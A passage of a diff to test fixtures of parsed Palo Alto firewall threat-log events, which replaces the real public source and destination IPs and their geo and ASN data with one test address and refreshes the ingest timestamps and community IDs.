08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079402200Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9403,28 +9386,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Redmond", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.1257, - "lat": 47.6722 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "65.54.161.34" + "ip": "175.16.199.1" }, - "message": "65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9465,7 +9447,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:qtNTXnMjHLAldLWQ5/jdyuCV6Yk=", + "community_id": "1:5SoLZizmsszANiI7xjGLSw7GJbQ=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -9500,15 +9482,15 @@ "jordy" ], "ip": [ - "65.54.161.34", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545808736Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079407900Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9545,28 +9527,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Redmond", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.1257, - "lat": 47.6722 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "65.55.5.231" + "ip": "175.16.199.1" }, - "message": "65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9607,7 +9588,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:OSQCnxYE2CqKztyfnzJHya/llPw=", + "community_id": "1:YwIjUf5XmZ40QrFQbjqLanySfdw=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -9642,15 +9623,15 @@ "jordy" ], "ip": [ - "65.55.5.231", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545815973Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079413500Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9673,26 +9654,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -118.244, - "lat": 34.0544 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "65.54.71.11" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9708,7 +9688,7 @@ }, "ip": "192.168.0.6" }, - "message": "192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9749,7 +9729,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MeB0cefg5kMN7f+LW+cirwH2nA8=", + "community_id": "1:XYAoUgct4Qp84w3QO5r+XC/xzUE=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -9785,14 +9765,14 @@ ], "ip": [ "192.168.0.6", - "65.54.71.11", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545823298Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079419400Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,\"c.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9829,25 +9809,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.17" + "ip": "175.16.199.1" }, - "message": "74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9888,7 +9870,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iDmf9CnG+CdUuHWmwVsmhee3/Qs=", + "community_id": "1:G3mrQpxPg+ppF9n+9Uc40LS+KX0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -9923,15 +9905,15 @@ "jordy" ], "ip": [ - "74.125.239.17", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545830460Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079425200Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9954,23 +9936,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40428, + "number": 4837, "organization": { - "name": "Pandora Media, Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.85.40.48" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9986,7 +9970,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10027,7 +10011,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:c67I85z1uJV7VW6M9MR5Q8fjHQM=", + "community_id": "1:ej0sWBrryoi/pHYI/R8rvOEHNQc=", "transport": "tcp", "application": "pandora", "direction": "inbound" @@ -10063,14 +10047,14 @@ ], "ip": [ "192.168.0.2", - "208.85.40.48", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545837761Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079430400Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10107,25 +10091,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.198" + "ip": "175.16.199.1" }, - "message": "74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10166,7 +10152,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:w5GKumufuJCv3Gw8bvP3vTxap24=", + "community_id": "1:lX77aiJ1H3y+5//PYYCh3tYdAyc=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -10201,15 +10187,15 @@ "picard" ], "ip": [ - "74.125.224.198", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545845078Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079433800Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10246,28 +10232,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-V", - "city_name": "Oliva", - "country_iso_code": "ES", - "country_name": "Spain", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Ukraine", - "region_name": "Valencia", + "region_name": "Jilin", "location": { - "lon": -0.1193, - "lat": 38.9197 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 12357, + "number": 4837, "organization": { - "name": "Vodafone Spain" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "188.190.124.75" + "ip": "175.16.199.1" }, - "message": "188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10308,7 +10293,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:a7oyQr47OdJP8ZnG9SCELvH8aco=", + "community_id": "1:TrrVRDnZdCQgLAGLHO4GHt2+qw4=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -10343,15 +10328,15 @@ "jordy" ], "ip": [ - "188.190.124.75", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545852351Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079438200Z", + "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10388,25 +10373,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10447,7 +10434,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:yyAK8WOE46l0/k8dVOECI6qa2zQ=", + "community_id": "1:dbOGjR1aWV8DyP4vLGz1QsZ0ny0=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -10482,15 +10469,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545862329Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079443200Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10527,25 +10514,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.3" + "ip": "175.16.199.1" }, - "message": "74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10586,7 +10575,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:15fj8zz0nlNi/Fnz8ibhS9Ihqdg=", + "community_id": "1:mtzOFl1R3JVEIPm0akw/TS3ROok=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -10621,15 +10610,15 @@ "picard" ], "ip": [ - "74.125.239.3", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545871646Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079448300Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10666,25 +10655,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.3" + "ip": "175.16.199.1" }, - "message": "74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10725,7 +10716,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:fl9AVyrQeXPX/eoeKOy+6/UoR8M=", + "community_id": "1:/n7j8c8MKf35yw9cDwEnJ7VUlqI=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -10760,15 +10751,15 @@ "picard" ], "ip": [ - "74.125.239.3", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545880255Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079452200Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 